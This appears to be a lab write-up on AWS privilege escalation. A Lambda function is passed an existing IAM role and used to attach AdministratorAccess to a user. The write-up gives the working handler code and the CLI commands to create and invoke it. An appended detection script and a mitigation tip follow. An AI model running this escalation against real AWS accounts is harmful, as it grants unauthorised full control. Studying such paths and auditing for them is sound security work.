root💀senseicat:~#

Hack. Eat. Sleep. Repeat!!!


Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

Lambda Privesc


aws iam list-roles --profile <iq> | jq


aws iam get-policy-version --policy-arn arn:aws:iam::865614241237:policy/cg-lambdaManager-policy-cgid1n6f5si8o5  --version-id v1 --profile lambda_secrets | jq 



Privilege Escalation with Lambda


pip install awscli

[temp-profile]
aws_access_key_id = ASIAxxxxxxxxxxxxxxxx
aws_secret_access_key = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
aws_session_token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

# solve.py
import boto3
import json

def lambda_handler(event, context):
    # Runs with the permissions of the role passed to the function at creation
    client = boto3.client('iam')
    # Attach the AWS-managed AdministratorAccess policy to the user
    response = client.attach_user_policy(UserName='chris-cgid1n6f5si8o5',PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess')
    return {'statusCode': 200, 'body': json.dumps(response)}

zip -r solve.zip solve.py

A user with the iam:PassRole, lambda:CreateFunction, and lambda:InvokeFunction permissions can escalate privileges by passing an existing IAM role to a new Lambda function. The function's code imports the relevant AWS library for their programming language of choice and uses it to perform actions of their choice with the passed role's permissions. The code can then be run by invoking the function through the AWS API.

aws lambda create-function --function-name unknown_lambda --runtime python3.11 --role arn:aws:iam::865614241237:role/cg-debug-role-<cgid>  --handler solve.lambda_handler --zip-file fileb://solve.zip --region us-east-1


aws lambda invoke --function-name unknown_lambda output.txt --region us-east-1
aws iam list-attached-user-policies --user-name chris-<cgid> --profile lambda_secrets | jq 
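
To audit for the permission combination described above, this added example (not part of the original write-up) checks an IAM policy document, i.e. the Document field of `aws iam get-policy-version` output, for iam:PassRole, lambda:CreateFunction and lambda:InvokeFunction. The function names and both sample policies are constructed for illustration; only Allow statements and Action patterns are evaluated, not Deny, NotAction, Resource or Condition.

```python
import fnmatch

# The three actions the write-up names as sufficient for this escalation path.
RISKY_COMBO = ("iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction")


def _as_list(value):
    """IAM allows a single value or a list for Statement and Action."""
    return value if isinstance(value, list) else [value]


def allowed_patterns(policy_document):
    """Collect the Action patterns from every Allow statement (lower-cased)."""
    patterns = []
    for stmt in _as_list(policy_document.get("Statement", [])):
        if stmt.get("Effect") == "Allow":
            patterns += [a.lower() for a in _as_list(stmt.get("Action", []))]
    return patterns


def granted(action, patterns):
    """IAM action names are case-insensitive and support * and ? wildcards."""
    return any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns)


def lambda_passrole_findings(policy_document):
    """Return the risky actions granted; the path is open if all three are."""
    patterns = allowed_patterns(policy_document)
    hits = [a for a in RISKY_COMBO if granted(a, patterns)]
    return {"granted": hits, "escalation_path": len(hits) == len(RISKY_COMBO)}


# Constructed sample documents (hypothetical, not the policy from the write-up).
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["lambda:*", "iam:PassRole"], "Resource": "*"}
    ],
}
SCOPED_POLICY = {
    "Version": "2012-10-17",
    "Statement": {"Effect": "Allow", "Action": "lambda:InvokeFunction",
                  "Resource": "arn:aws:lambda:us-east-1:111122223333:function:report"},
}

if __name__ == "__main__":
    print(lambda_passrole_findings(WEAK_POLICY))
    print(lambda_passrole_findings(SCOPED_POLICY))
```

A policy that must keep iam:PassRole can narrow this path by limiting its Resource to specific role ARNs and adding the iam:PassedToService condition key.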
